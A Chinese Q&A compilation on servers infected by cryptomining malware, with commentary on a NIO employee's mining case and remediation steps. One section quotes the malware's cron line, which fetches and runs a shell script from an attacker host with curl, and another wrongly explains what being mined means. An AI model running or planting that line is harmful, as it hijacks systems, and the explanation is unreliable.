當前位置:首頁 » 挖礦知識 » 伺服器被挖礦的

伺服器被挖礦的

發布時間: 2022-07-18 17:07:56

Ⅰ 蔚來員工利用公司伺服器挖礦,你了解虛擬貨幣

蔚來員工利用公司伺服器挖礦,虛擬貨幣其實就是一種沒有信用背書的商品,虛擬貨幣沒有任何實在價值,它的價格都是通過炒作得來的。

蔚來員工利用公司伺服器挖礦一年才被發現成了大家茶餘飯後的談資,不少人覺得這名員工做得很過分,畢竟這本身就是侵佔了公司利益的一種行為。然而大家關注點更加在虛擬貨幣上,虛擬貨幣在去年年中的時候曾經有過一股下跌潮,隨著馬斯克在虛擬貨幣市場的退出,比特幣等虛擬貨幣一下就跌到了上漲之前的水平,不少的人都站在了山頂上——風吹屁屁涼。實話說,虛擬貨幣的漲跌是由市場炒作者們追捧導致的,虛擬貨幣沒有任何價值,我們千萬要慎重投資。

Ⅱ 蔚來的員工被曝利用伺服器挖礦,這是否會影響到蔚來的經營

蔚來汽車為何又被曝出不良事件?

員工被曝光出利用公司的電腦挖礦,這會對公司產生不良的影響。

既然此件事情已經報告出來,蔚來公司一定會寄出一個合理的答復。我們也希望這個回復可以越快越好,畢竟作為一個國內知名的新能源汽車品牌,他們已經在公眾的心目當中有了一個公信度,在如此關鍵的成長階段出現這么不好的負面新聞,稍微處理不善就有可能將其品牌的公信度大大減少,並且影響到今後的新品汽車發售以及銷售問題。也希望官方能夠注意到這件事情的嚴重性,從公司的內部進行一次徹徹底底的大審查,爭取杜絕今後再在企業內部發生這樣的事情。

Ⅲ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top,查看了一會,沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句:

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:

View Code

解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.

Ⅳ 蔚來內部員工利用伺服器挖礦,其行為在法律中如何定性

蔚來汽車內部員工利用伺服器挖礦,其行為在刑事法律上應該被定性為非法控制計算機信息系統罪,其行為在民事法律上也對其所在公司有財產侵權行為,所以也有可能需要承擔民事法律責任。

近日,有社交博主在社交平台上發布了未來汽車某個員工利用伺服器挖礦的秘聞,不少的人都被震驚到了,原來大公司的人也需要靠挖礦來維持生計,這可真的是相當不容易。然而大家更關注的則是該員工涉及的法律問題有哪些,畢竟該員工已經在公司利用公司的電腦系統挖了一年的礦了,公司的管理人員如果不是在其他人舉報的情況下可能還不會發現這種違規違法的事情。話說回來,該員工的行為肯定是涉及民事上的和刑事上的法律問題的,我們必須清晰知道這一點。

Ⅳ 伺服器被下挖礦了怎麼辦

哥們被下了啥挖礦?去舉報啊。之前流量礦石非常火的時候,我的伺服器也被無良黑了,成了肉雞,然後我去找到他的信息,截圖跟流量礦石舉報,就幫我處理了。你看你的被下了啥,就去找他們處理。

Ⅵ 被挖礦是什麼意思

就是被獲取了比特幣。
挖礦是指利用電腦硬體計算出比特幣的位置並獲取比特幣,這一過程被稱之為挖礦。每隔一個時間點,比特幣系統會在系統節點上生成一個隨機代碼,互聯網中的所有計算機都可以去尋找此代碼,誰找到此代碼,就會產生一個區塊,隨即得到一個比特幣,這個過程就是人們常說的挖礦。
計算這個隨機代碼需要大量的GPU運算,於是礦工們采購海量顯卡用以更快速的獲得比特幣獲利。比特幣挖礦機,就是用於賺取比特幣的電腦,這類電腦一般有專業的挖礦晶元,多採用燒顯卡的方式工作,耗電量較大。用戶用個人計算機下載軟體然後運行特定演算法,與遠方伺服器通訊後可得到相應比特幣,是獲取比特幣的方式之一。

Ⅶ 伺服器被rshim挖礦病毒攻擊後 HugePages_Total 透明大頁怎麼都清不掉 一直佔用內存 球球

問題定位及解決步驟:

1、free -m 查看內存使用狀態 ,發現free基本沒了。--> 懷疑是服務有內存泄漏,開始排查

2、使用top命令觀察,開啟的服務佔用內存量並不大,且最終文檔在一個值,且服務為java應用,內存並沒達到父jvm設置上限。按top監控佔用內存排序,加起來也不會超過物理內存總量。查看硬碟使用量,佔用20%。基本排除虛擬內存佔用過大的原因。--->排除服務內存泄漏因素,懷疑mysql和nginx,開始排查

3、因為top命令看 mysql佔用內存也再可控范圍,是否存在connection佔用過多內存,發現並不會,設置最大連接數為1000,最多也不會超過幾M。 nginx佔用一直非常小。但每次最先被kill的基本都是nginx進程。所以排查,但發現無非就是openfiles數量啥的調整。發現也一切正常。且之前niginx可以正常使用的。

4、最為費解的就是 通過free -m 查看的時候 基本全是used,cache部分很少,free基本沒有。但top上又找不到有哪些進程佔用了內存。無解

5、注意到有兩個進程雖佔用內存不多,但基本耗光了100%的cpu。開始想著佔cpu就佔了,沒占內存,現在是內存不不夠導致進程被kill的,就沒注意這點。

6、實在搞不定,重啟伺服器,重啟了所有服務,服務暫時可用,回家。在路上的時候發現又崩了。忐忑的睡覺。

7、早上起來繼續看,這次留意注意了下那兩個佔用高cpu的進程,kdevtmpfsi 和 networkservice。本著看看是啥進程的心態,網路了下。真相一目瞭然,兩個挖礦病毒。

突然後知後覺的意識到錯誤原因:

1、cpu佔用率高,正常服務使用cpu頻率較高的服務最容易最內存超標。(因為在需要使用cpu時沒cpu資源,內存大量佔用,服務瞬間崩潰),然後看top發現剛剛已經佔用內存的進程已經被kill了,所以沒發現內存有高佔用的情況。
2、後面的應用繼續使用cpu時也會發生類似情況,倒是服務一個一個逐漸被kill。

問題點基本定位好了,解決問題就相對簡單很多:
通過網路,google,常見的病毒清除步驟基本都能解決。這兩個挖礦病毒很常見,大致記錄下要點。可能所有病毒都會有這些基礎操作。

① 首先,查看當前系統中的定時任務:crontab -l
我伺服器上有四個定時下載任務 通過wget 和 curl 下載病毒文件,把異常的刪掉。要不然刪了病毒文件還是會下載下來
crontab -r,全部刪除命令(或根據需求刪除定時任務)

② 查找病毒文件 可以全部模糊搜索 清除, 但病毒文件基本都用了chattr +i命令 使用chattr -i filename 後再使用rm -f filename 。可刪除

③ kill 病毒進程,但注意kill了可能馬上就重啟了。因為有守護進程,需要把病毒進程的守護進程也kill掉

④ 檢查是否root用戶被攻擊,可能系統配置信息被更改。

⑤ 最好能理解病毒腳本,通過看代碼看它做了些什麼。針對腳本取修復系統。

Ⅷ 求助伺服器被挖礦程序入侵,如何排查

新客戶於最近向我們SINE安全公司咨詢,說他的伺服器經常卡的網站無法打開,遠程連接

伺服器的慢的要命,有時候PING值都達到300-500之間,還經常掉包,聽客戶這么一說,一般

會判斷為受到了CC+DDOS混合流量攻擊,再具體一問,說是機房那面沒有受到流量攻擊,這

就有點奇怪了,不是流量攻擊,還導致伺服器卡,網站無法打開,這是什麼攻擊?為了解決客

戶伺服器卡的問題,我們隨即安排安全工程師對他的Linux伺服器進行了安全檢測與安全部署。

挖礦木馬還設計了挖礦進程如果被客戶強制停止後,會自動啟動繼續挖礦,達到不間斷的挖礦,

仔細檢查發現是通過設置了每個小時執行任務計劃,遠程下載shell挖礦木馬,然後執行,檢查

當前進程是否存在,不存在就啟動挖礦木馬,進行挖礦。

對客戶的linux伺服器進行詳細了安全檢測發現幸虧沒有加密伺服器的數據,以及感染蠕蟲的病

毒,如果數據被加密那損失大了,客戶是做平台的,裡面的客戶數據很重要,找出挖礦木馬後,

客戶需要知道伺服器到底是如何被攻擊的? 被上傳挖礦木馬的? 防止後期再出現這樣的攻擊

狀況。

通過我們安全工程師的安全檢測與分析,發現該伺服器使用的是apache tomcat環境,平台的開

發架構是JSP+oracle資料庫,apache tomcat使用的是2016年的版本,導致該apache存在嚴重

的遠程執行命令漏洞,入侵者可以通過該漏洞直接入侵伺服器,拿到伺服器的管理員許可權,

SINE安全工程師立即對apache 漏洞進行修復,並清除木馬,至此問題得以解決,客戶伺服器

一切穩定運行,網站打開正常。

Ⅸ 蔚來員工利用公司伺服器挖礦,這一行為是否違法

蔚來員工利用職務之便,從2021年2月開始使用公司伺服器進行挖礦,從中獲取利益,這個行為明顯已經觸犯了我國的相關法律。

其實利用公司資源進行非法挖礦行為早有先例,在2018年1月到5月期間,網路一個運維員工就曾經在網路公司伺服器上安裝挖礦程序,通過公司的資源謀取暴利,之後將挖礦所得的虛擬貨幣賣出,從中獲得10萬元人民幣,後來,在網路公司的追查下,這名員工才被發現,並且因涉嫌非法控制計算機信息系統罪被判有期徒刑三年,並處罰金1.1萬元,扣押違法所得10萬元整。

而對於挖礦這個行為,國家是堅決打擊的,目前相關的省份也出台了相關的文件,表面上只是提高了挖礦公司的電費,實際上是為了讓從事挖礦的人員知難而退,因為電費一旦上漲,那麼相對應的挖礦成本也就增加了。

綜上所述,該蔚來員工利用職務之便進行挖礦行為,已經涉嫌非法控制計算機信息系統罪,所以,他極有可能會因為此罪名而被起訴。

熱點內容
比特幣技術指標kdj 發布:2025-06-07 06:11:55 瀏覽:997
區塊鏈技術的特點是去中心化 發布:2025-06-07 05:53:24 瀏覽:934
以太坊交易所最小交易單位 發布:2025-06-07 05:51:45 瀏覽:216
區塊鏈代碼如何編寫 發布:2025-06-07 05:46:51 瀏覽:852
算力480多久能挖一個比特幣 發布:2025-06-07 05:33:53 瀏覽:817
一天能挖幾個以太坊幣 發布:2025-06-07 05:29:08 瀏覽:705
比特幣私鑰如何保密 發布:2025-06-07 05:14:31 瀏覽:375
比特幣區塊鏈民法中的貨幣 發布:2025-06-07 05:00:36 瀏覽:464
挖出比特幣是偶然還是必然 發布:2025-06-07 05:00:34 瀏覽:574
區塊鏈與大數據無關對m 發布:2025-06-07 04:57:53 瀏覽:939